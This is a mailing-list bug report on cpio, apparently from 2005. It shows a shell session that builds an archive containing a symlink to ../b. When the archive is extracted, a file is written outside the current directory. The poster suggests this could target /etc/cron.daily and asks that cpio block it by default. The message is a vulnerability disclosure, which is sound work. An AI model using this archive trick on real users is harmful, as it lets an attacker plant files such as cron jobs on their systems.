[Bug-cpio] Re: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..)

[t takahashi]

P.P.S.  I found a more subtle security hole.  It is even more dangerous.

/tmp/aaa$ mkdir ../b
/tmp/aaa$ ln -s ../b b
/tmp/aaa$ touch ../b/trojan
/tmp/aaa$ ls b
trojan
/tmp/aaa$ find b b/trojan
b
b/trojan
/tmp/aaa$ find b b/trojan | cpio -o > dangerous
cpio: b: truncating inode number
cpio: b/trojan: truncating inode number
1 block
/tmp/aaa$ /bin/rm -v b/trojan b
removed `b/trojan'
removed `b'
/tmp/aaa$ ls
dangerous
/tmp/aaa$ cpio -t<dangerous 
b
b/trojan
1 block
/tmp/aaa$ cpio -vt<dangerous 
lrwxrwxrwx   1 kpc      kpc             4 Apr 27 19:46 b -> ../b
-rw-------   1 kpc      kpc             0 Apr 27 19:46 b/trojan
1 block

Notice that grep '\.\.' on the output of cpio -t would not find the
relative pathname.  You have to use cpio -vt.  Now watch this:

/tmp/aaa$ cpio -i<dangerous 
1 block
/tmp/aaa$ ls
b  dangerous
/tmp/aaa$ ls ../b
trojan

IMHO cpio should disallow this by default.  Imagine
../../../../../../../etc/cron.daily again.  cpio should check for
extracting in directories that are not below pwd, even if it is via
indirect means such as a symlink.

Wow!